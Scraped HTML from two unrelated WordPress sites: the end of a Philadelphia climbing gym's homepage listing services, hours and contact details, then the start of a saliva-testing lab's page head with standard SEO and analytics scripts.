class="sc_services color_style_default sc_services_default2 sc_services_featured_top services_columns"><div class="sc_services_columns_wrap sc_item_columns sc_item_columns_4 trx_addons_columns_wrap columns_padding_bottom"><div class="trx_addons_column-1_4"><div class="sc_services_item with_content with_image sc_services_item_featured_top" ><div class="sc_services_item_info"><div class="sc_services_item_header" style="background-image: url(https://tufasboulderlounge.com/wp-content/uploads/2018/04/Services4.jpg )"><h4 class="sc_services_item_title">Training</h4></div><div class="sc_services_item_subtitle"><a href="https://tufasboulderlounge.com/services_group/our-services/" title="View all posts in Our Services">Our Services</a></div><div class="sc_services_item_content"><ul><li>Adjustable Kilter Board</li><li>Adjustable Tension Board</li><li>Double sided Campus Board</li><li>Poutre Board</li></ul></div></div></div></div><div class="trx_addons_column-1_4"><div class="sc_services_item with_content with_image sc_services_item_featured_top" ><div class="sc_services_item_info"><div class="sc_services_item_header" style="background-image: url(https://tufasboulderlounge.com/wp-content/uploads/2018/04/Services2.jpg )"><h4 class="sc_services_item_title">Bouldering</h4></div><div class="sc_services_item_subtitle"><a href="https://tufasboulderlounge.com/services_group/our-services/" title="View all posts in Our Services">Our Services</a></div><div class="sc_services_item_content"><ul><li>5500 sqft of climbing terrain across 220 Linear feet of climbing</li><li>Walls from slab through full on roof</li><li>Averaging 16&#8242;</li></ul></div></div></div></div><div class="trx_addons_column-1_4"><div class="sc_services_item with_content with_image sc_services_item_featured_top" ><div class="sc_services_item_info"><div class="sc_services_item_header" style="background-image: url(https://tufasboulderlounge.com/wp-content/uploads/2018/04/Services3.jpg )"><h4 class="sc_services_item_title">Fitness</h4></div><div class="sc_services_item_subtitle"><a href="https://tufasboulderlounge.com/services_group/our-services/" title="View all posts in Our Services">Our Services</a></div><div class="sc_services_item_content"><ul><li>Cardio</li><li>Suspension Training</li><li>Lifting Rack</li><li>Free Weights</li><li>Cable Machine</li></ul></div></div></div></div><div class="trx_addons_column-1_4"><div class="sc_services_item with_content with_image sc_services_item_featured_top" ><div class="sc_services_item_info"><div class="sc_services_item_header" style="background-image: url(https://tufasboulderlounge.com/wp-content/uploads/2018/04/Services1.jpg )"><h4 class="sc_services_item_title">Lounge</h4></div><div class="sc_services_item_subtitle"><a href="https://tufasboulderlounge.com/services_group/our-services/" title="View all posts in Our Services">Our Services</a></div><div class="sc_services_item_content"><ul><li>Comfortable seating</li><li>Reading material</li><li>WiFi</li><li><a href="https://www.reanimatorcoffee.com/" style="color:white">Reanimator Coffee</a></li><li>Ping Pong Table</li><ul></div></div></div></div></div></div><div class="sc_item_button sc_button_wrap sc_align_center"><a href="/pricing" id="sc_button_1619923692" class="sc_button color_style_default sc_button_default about-button sc_button_size_normal sc_button_icon_left"><span class="sc_button_text sc_align_center"><span class="sc_button_title">SEE OUR PRICES</span></span></a></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 3em" ><span class="vc_empty_space_inner"></span></div><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p style="text-align: center;"><strong>Climbing wall design and bouldering pads supplied by</strong></p></div></div><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"> <a href="http://www.futuristclimbing.com/" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="63" src="https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-300x63.png" class="vc_single_image-img attachment-medium" alt="Futurist Climbing" srcset="https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-300x63.png 300w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-768x162.png 768w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-1024x216.png 1024w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-370x78.png 370w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo-835x176.png 835w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/FCC-logo.png 1170w" sizes="(max-width: 300px) 100vw, 300px" /></a></figure></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 3.5em" ><span class="vc_empty_space_inner"></span></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts sc_layouts_default sc_layouts_161 email_subscribe"><div data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1522770938144 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 4.2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_row wpb_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-6 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 15px" ><span class="vc_empty_space_inner"></span></div><h4 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1520445992642" >Subscribe to Tufas</h4><div class="vc_empty_space" style="height: 8px" ><span class="vc_empty_space_inner"></span></div><p style="font-size: 18px;color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1520445999128" >We'll send you the latest on our progress and opening events!</p><div class="vc_empty_space" style="height: 8px" ><span class="vc_empty_space_inner"></span></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p style="text-align: center;"><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })();</script><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-564" method="post" data-id="564" data-name="" ><div class="mc4wp-form-fields"><p> <input type="email" name="EMAIL" placeholder="your email" required /> <input type="submit" value="subscribe" /></p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1557954833" /><input type="hidden" name="_mc4wp_form_id" value="564" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form></p></div></div></div></div></div></div><div class="vc_empty_space" style="height: 2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 4.2em" ><span class="vc_empty_space_inner"></span></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts sc_layouts_default sc_layouts_614 get-in-touch_desktop"><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1519590902131 vc_row-has-fill vc_column-gap-35 vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="#contact" class="sc_content color_style_default sc_content_default sc_content_width_1_1 sc_float_left sc_align_left vc_custom_1519737399885"><div class="sc_content_container"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1536969758842"><div class="home_map_column wpb_column vc_column_container vc_col-sm-6 vc_col-has-fill sc_layouts_column_icons_position_left"><div class="vc_column-inner vc_custom_1519590830723"><div class="wpb_wrapper"><div class="wpb_gmaps_widget wpb_content_element vc_map_responsive vc_custom_1519697417981" ><div class="wpb_wrapper"><div class="wpb_map_wraper"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3057.4596259231284!2d-75.14622848461744!3d39.97583277941884!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89c6c872b8e44d21%3A0x800d4ef5c9f914bc!2s1614+N+5th+St%2C+Philadelphia%2C+PA+19122!5e0!3m2!1sen!2sus!4v1519697389732" width="600" height="450" frameborder="0" style="border:0" allowfullscreen></iframe></div></div></div></div></div></div><div class="home_contact_column wpb_column vc_column_container vc_col-sm-6 vc_col-has-fill sc_layouts_column_icons_position_left"><div class="vc_column-inner vc_custom_1519590865240"><div class="wpb_wrapper"><h4 style="text-align: left" class="vc_custom_heading vc_custom_1536969675103" >Get in Touch</h4><div class="vc_empty_space contact-space-2_959" style="height: 15px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_1121023670" class="sc_layouts_iconed_text hours-text"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-clock-empty"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">Monday, Wednesday, Friday 10am-11pm</span></span></div><div class="wpb_text_column wpb_content_element hours-lines" ><div class="wpb_wrapper"><p>Tuesday, Thursday 8am-11pm</p></div></div><div class="wpb_text_column wpb_content_element hours-lines" ><div class="wpb_wrapper"><p>Saturday, Sunday 8am-8pm</p></div></div><div class="vc_empty_space contact-space-2_959" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_213313332" class="sc_layouts_iconed_text"><a href="mailto:[email protected]" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-mail"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">[email protected]</span></span></a></div><div class="vc_empty_space contact-space-2_959" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_286213040" class="sc_layouts_iconed_text"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-phone"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">215-360-3999</span></span></div><div class="vc_empty_space" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_636183037" class="sc_layouts_iconed_text"><a href="https://www.google.com/maps/place/1614+N+5th+St,+Philadelphia,+PA+19122/@39.9758369,-75.1462338,17z/data=!3m1!4b1!4m5!3m4!1s0x89c6c872b8e44d21:0x800d4ef5c9f914bc!8m2!3d39.9758328!4d-75.1440398" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-location-2"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">1614 N. 5th St.,</span><span class="sc_layouts_item_details_line2 sc_layouts_iconed_text_line2">Philadelphia, PA 19122</span></span></a></div></div></div></div></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div></div><div class="sc_layouts sc_layouts_default sc_layouts_871 get-in-touch_mobile"><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1520856179671 vc_row-has-fill vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-has-fill sc_layouts_column_icons_position_left"><div class="vc_column-inner vc_custom_1520856172562"><div class="wpb_wrapper"><div id="sc_content_1712031919" class="sc_content color_style_default sc_content_default sc_content_width_1_1 sc_float_left sc_align_left get-in-touch_text vc_custom_1520900175496"><div class="sc_content_container"><div class="vc_empty_space" style="height: 10px" ><span class="vc_empty_space_inner"></span></div><h2 style="text-align: center" class="vc_custom_heading vc_custom_1522941292494" >Get in Touch</h2><div class="vc_empty_space" style="height: 15px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_1714144510" class="sc_layouts_iconed_text hours-text"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-clock-empty"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">Monday, Wednesday, Friday 10am-11pm</span></span></div><div class="wpb_text_column wpb_content_element hours-lines" ><div class="wpb_wrapper"><p style="text-align: center;">Tuesday, Thursday 8am-11pm</p></div></div><div class="wpb_text_column wpb_content_element hours-lines" ><div class="wpb_wrapper"><p style="text-align: center;">Saturday, Sunday 8am-8pm</p></div></div><div class="vc_empty_space" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_286041412" class="sc_layouts_iconed_text"><a href="mailto:[email protected]" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-mail"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">[email protected]</span></span></a></div><div class="vc_empty_space" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_716390314" class="sc_layouts_iconed_text"><a href="tel:215-360-3999" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-phone"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">215-360-3999</span></span></a></div><div class="vc_empty_space" style="height: 25px" ><span class="vc_empty_space_inner"></span></div><div id="sc_layouts_iconed_text_627711252" class="sc_layouts_iconed_text"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-location-2"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line1 sc_layouts_iconed_text_line1">1614 N. 5th St.,</span><span class="sc_layouts_item_details_line2 sc_layouts_iconed_text_line2">Philadelphia, PA 19122</span></span></div><div class="vc_empty_space" style="height: 45px" ><span class="vc_empty_space_inner"></span></div></div></div><div class="wpb_gmaps_widget wpb_content_element vc_map_responsive vc_custom_1520858828396 home_map_column" ><div class="wpb_wrapper"><div class="wpb_map_wraper"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3057.4596259231284!2d-75.14622848461744!3d39.97583277941884!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89c6c872b8e44d21%3A0x800d4ef5c9f914bc!2s1614+N+5th+St%2C+Philadelphia%2C+PA+19122!5e0!3m2!1sen!2sus!4v1519697389732" width="479" height="300" frameborder="0" style="border:0" allowfullscreen></iframe></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div></div></div></div></div></div></div></article></div></div></div><footer class="footer_wrap footer_custom footer_custom_16 footer_custom_footer-standard-alternative scheme_dark"><div class="vc_row wpb_row vc_row-fluid vc_custom_1519696588405 vc_row-has-fill vc_row-o-content-middle vc_row-flex sc_layouts_row sc_layouts_row_type_compact"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_1035999535" class="sc_content color_style_default sc_content_default sc_content_width_1_1 sc_float_center"><div class="sc_content_container"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_row-o-content-middle vc_row-flex"><div class="wpb_column vc_column_container vc_col-sm-6 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_wp_text wpb_content_element footer_copy"><div class="widget widget_text"><div class="textwidget"><p>Tufas Boulder Lounge © 2018 All rights reserved.</p></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 sc_layouts_column sc_layouts_column_align_right sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts_item"><div id="widget_socials_1471378293" class="widget_area sc_widget_socials vc_widget_socials wpb_content_element footer_social"><aside id="widget_socials_1471378293_widget" class="widget widget_socials"><div class="socials_wrap sc_align_right"><a target="_blank" href="mailto:[email protected]" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_mail"><span class="icon-mail"></span></span></a><a target="_blank" href="https://www.facebook.com/Tufas-Boulder-Lounge-441113616306649/" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_facebook"><span class="icon-facebook"></span></span></a><a target="_blank" href="https://www.instagram.com/tufas_boulder_lounge/" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_instagramm"><span class="icon-instagramm"></span></span></a></div></aside></div></div></div></div></div></div></div></div></div></div></div></div></footer></div></div> <script type="text/javascript">var sbiajaxurl = "https://tufasboulderlounge.com/wp-admin/admin-ajax.php";</script> <script>( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body );</script> <script>var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};var tribe_system_info = {"sysinfo_optin_nonce":"26156e8649","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};</script><script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script> <script type="text/javascript">function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); }</script> <script type='text/javascript'>var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"};</script> <script type='text/javascript'>var TRX_ADDONS_STORAGE = {"ajax_url":"https:\/\/tufasboulderlounge.com\/wp-admin\/admin-ajax.php","ajax_nonce":"e4bbdd7808","site_url":"https:\/\/tufasboulderlounge.com","post_id":"346","vc_edit_mode":"0","popup_engine":"magnific","animate_inner_links":"0","user_logged_in":"0","email_mask":"^([a-zA-Z0-9_\\-]+\\.)*[a-zA-Z0-9_\\-]+@[a-z0-9_\\-]+(\\.[a-z0-9_\\-]+)*\\.[a-z]{2,6}$","msg_ajax_error":"Invalid server answer!","msg_magnific_loading":"Loading image","msg_magnific_error":"Error loading image","msg_error_like":"Error saving your like! Please, try again later.","msg_field_name_empty":"The name can't be empty","msg_field_email_empty":"Too short (or empty) email address","msg_field_email_not_valid":"Invalid email address","msg_field_text_empty":"The message text can't be empty","msg_search_error":"Search error! Try again later.","msg_send_complete":"Send message complete!","msg_send_error":"Transmit failed!","ajax_views":"","menu_cache":[".menu_mobile_inner > nav > ul"],"login_via_ajax":"1","msg_login_empty":"The Login field can't be empty","msg_login_long":"The Login field is too long","msg_password_empty":"The password can't be empty and shorter then 4 characters","msg_password_long":"The password is too long","msg_login_success":"Login success! The page should be reloaded in 3 sec.","msg_login_error":"Login failed!","msg_not_agree":"Please, read and check 'Terms and Conditions'","msg_email_long":"E-mail address is too long","msg_email_not_valid":"E-mail address is invalid","msg_password_not_equal":"The passwords in both fields are not equal","msg_registration_success":"Registration success! Please log in!","msg_registration_error":"Registration failed!","msg_sc_googlemap_not_avail":"Googlemap service is not available","msg_sc_googlemap_geocoder_error":"Error while geocode address"};</script> <script type='text/javascript'>var ALHAMBRA_STORAGE = {"ajax_url":"https:\/\/tufasboulderlounge.com\/wp-admin\/admin-ajax.php","ajax_nonce":"e4bbdd7808","site_url":"https:\/\/tufasboulderlounge.com","theme_url":"https:\/\/tufasboulderlounge.com\/wp-content\/themes\/alhambra","site_scheme":"scheme_default","user_logged_in":"","mobile_layout_width":"767","mobile_device":"","menu_side_stretch":"","menu_side_icons":"1","background_video":"","use_mediaelements":"1","comment_maxlength":"1000","admin_mode":"","email_mask":"^([a-zA-Z0-9_\\-]+\\.)*[a-zA-Z0-9_\\-]+@[a-z0-9_\\-]+(\\.[a-z0-9_\\-]+)*\\.[a-z]{2,6}$","strings":{"ajax_error":"Invalid server answer!","error_global":"Error data validation!","name_empty":"The name can&#039;t be empty","name_long":"Too long name","email_empty":"Too short (or empty) email address","email_long":"Too long email address","email_not_valid":"Invalid email address","text_empty":"The message text can&#039;t be empty","text_long":"Too long message text"},"alter_link_color":"#212620","button_hover":"default"};</script> <script type='text/javascript'>var mc4wp_forms_config = [];</script> <!--[if lte IE 9]> <script type='text/javascript' src='https://tufasboulderlounge.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.3.2'></script> <![endif]--> <a href="#" class="trx_addons_scroll_to_top trx_addons_icon-up" title="Scroll to top"></a> <script type="text/javascript" defer src="https://tufasboulderlounge.com/wp-content/cache/autoptimize/js/autoptimize_a301363d4f32f569f94fd82c3ff1488e.js"></script><script data-cfasync='false'>!function(t){"use strict";t.loadCSS||(t.loadCSS=function(){});var e=loadCSS.relpreload={};if(e.support=function(){var e;try{e=t.document.createElement("link").relList.supports("preload")}catch(t){e=!1}return function(){return e}}(),e.bindMediaToggle=function(t){function e(){t.media=a}var a=t.media||"all";t.addEventListener?t.addEventListener("load",e):t.attachEvent&&t.attachEvent("onload",e),setTimeout(function(){t.rel="stylesheet",t.media="only x"}),setTimeout(e,3e3)},e.poly=function(){if(!e.support())for(var a=t.document.getElementsByTagName("link"),n=0;n<a.length;n++){var o=a[n];"preload"!==o.rel||"style"!==o.getAttribute("as")||o.getAttribute("data-loadcss")||(o.setAttribute("data-loadcss",!0),e.bindMediaToggle(o))}},!e.support()){e.poly();var a=t.setInterval(e.poly,500);t.addEventListener?t.addEventListener("load",function(){e.poly(),t.clearInterval(a)}):t.attachEvent&&t.attachEvent("onload",function(){e.poly(),t.clearInterval(a)})}"undefined"!=typeof exports?exports.loadCSS=loadCSS:t.loadCSS=loadCSS}("undefined"!=typeof global?global:this);</script></body></html>
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://www.diagnostechs.com/xmlrpc.php"> <title>Home - DiagnosTechs, Inc.</title> <!-- This site is optimized with the Yoast SEO plugin v10.0.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Since 1987, DiagnosTechs has pursued proven, noninvasive testing, becoming the first lab to introduce saliva testing for cortisol in routine practice."/> <link rel="canonical" href="https://www.diagnostechs.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - DiagnosTechs, Inc." /> <meta property="og:description" content="Since 1987, DiagnosTechs has pursued proven, noninvasive testing, becoming the first lab to introduce saliva testing for cortisol in routine practice." /> <meta property="og:url" content="https://www.diagnostechs.com/" /> <meta property="og:site_name" content="DiagnosTechs, Inc." /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Since 1987, DiagnosTechs has pursued proven, noninvasive testing, becoming the first lab to introduce saliva testing for cortisol in routine practice." /> <meta name="twitter:title" content="Home - DiagnosTechs, Inc." /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.diagnostechs.com/#website","url":"https://www.diagnostechs.com/","name":"DiagnosTechs, Inc.","potentialAction":{"@type":"SearchAction","target":"https://www.diagnostechs.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="bdvZ3ga1X9h3ywSQ6c9FIToI5gII1TZkm0sFbimA5qY" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="DiagnosTechs, Inc. &raquo; Feed" href="https://www.diagnostechs.com/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-24776974-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-24776974-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.diagnostechs.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function 